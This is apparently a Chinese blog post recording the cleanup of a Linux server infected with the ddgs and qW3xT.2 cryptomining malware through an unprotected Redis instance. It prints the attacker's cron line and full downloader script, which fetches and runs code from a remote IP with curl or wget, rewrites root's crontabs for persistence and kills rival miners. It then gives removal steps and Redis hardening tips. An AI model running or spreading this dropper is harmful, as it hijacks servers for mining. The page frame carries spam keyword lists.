婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > linux服務器被植入ddgs、qW3xT.2挖礦病毒的處理實戰記錄

linux服務器被植入ddgs、qW3xT.2挖礦病毒的處理實戰記錄

熱門標簽:昆明外呼系統 臨汾電銷機器人費用 地圖標注需要提交啥資料入駐 400電話申請找哪家公司 七大洲地圖標注 地圖標注w是什么方向 河南省鄭州市地圖標注 福州呼叫中心外呼系統哪家好 新鄉人工智能電話機器人加盟

前言

隨著虛擬貨幣的瘋狂炒作,挖礦病毒已經成為不法分子利用最為頻繁的攻擊方式之一。病毒傳播者可以利用個人電腦或服務器進行挖礦,具體現象為電腦CPU占用率高,C盤可使用空間驟降,電腦溫度升高,風扇噪聲增大等問題。

本文主要介紹的是關于linux植入ddgs、qW3xT.2挖礦病毒的處理方法,下面話不多說了,來一起看看詳細的介紹吧

被入侵后的現象:

發現有qW3xT.2與ddgs兩個異常進程,消耗了較高的cpu,kill掉后 過一會就會重新出現。

kill 掉這兩個異常進程后,過一段時間看到了如下進程:

首先在/etc/sysconfig/crotnab中的定時任務沒有找到定時腳本,輸入crontab -e 在其中找到了該定時任務

*/5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh
<span style="font-size: 15px;">查詢了下149.56.106.215在美國,i.sh 腳本內容如下:</span>
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
if [ ! -f "/tmp/ddgs.3013" ]; then
 wget -q http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -O /tmp/ddgs.3013
 curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
fi
chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill

處理方法:

1.刪除  crontab -e 中

*/5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh

2.清除/root/.ssh/authorized_keys 中黑客設置的免密登錄內容

3.修改redis密碼

4.修改root與登錄賬戶密碼

安全建議:

1.配置bind選項,限定可以連接Redis服務器的IP,修改 Redis 的默認端口6379 配置認證,也就是AUTH,設置密碼,密碼會以明文方式保存在Redis配置文件中

2.配置rename-command 配置項 “RENAME_CONFIG”,這樣即使存在未授權訪問,也能夠給攻擊者使用config 指令加大難度

3.如果可以在防火墻中屏蔽redis外網      

入侵方式:

收集了相關資料,了解到其是利用redis漏洞,未設置密碼或密碼太簡單,導致的被入侵。具體方式可以參考

https://www.jb51.net/article/147375.htm

reids修改密碼方法如下:

redis-cli -h 127.0.0.1 -p 6379
config get requirepass ##獲取當前密碼
config set requirepass "yourpassword" ##設置當前密碼,服務重新啟動后又會置為默認,即無密碼;

永久生效方法為,打開redis配置文件redis.conf,找到requirepass值修改密碼,如下:

requirepass yourpassword ##此處注意,行前不能有空格

總結

以上就是這篇文章的全部內容了,希望本文的內容對大家的學習或者工作具有一定的參考學習價值,如果有疑問大家可以留言交流,謝謝大家對腳本之家的支持。

標簽:岳陽 股票 四川 海口 鎮江 烏海 臨沂 紅河

巨人網絡通訊聲明:本文標題《linux服務器被植入ddgs、qW3xT.2挖礦病毒的處理實戰記錄》,本文關鍵詞  linux,服務器,被,植入,ddgs,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《linux服務器被植入ddgs、qW3xT.2挖礦病毒的處理實戰記錄》相關的同類信息!
  • 本頁收集關于linux服務器被植入ddgs、qW3xT.2挖礦病毒的處理實戰記錄的相關信息資訊供網民參考!
  • 推薦文章
    主站蜘蛛池模板: 图们市| 凯里市| 吉木乃县| 蓬溪县| 永安市| 聂拉木县| 营山县| 昭通市| 云阳县| 泸水县| 丹棱县| 崇信县| 浙江省| 乌审旗| 徐州市| 故城县| 游戏| 色达县| 郎溪县| 抚松县| 上高县| 苍梧县| 西乌| 出国| 依安县| 卢氏县| 潜江市| 通榆县| 霞浦县| 芷江| 健康| 敦煌市| 霍山县| 赞皇县| 永仁县| 浮梁县| 黎平县| 孙吴县| 郓城县| 禄劝| 乐清市|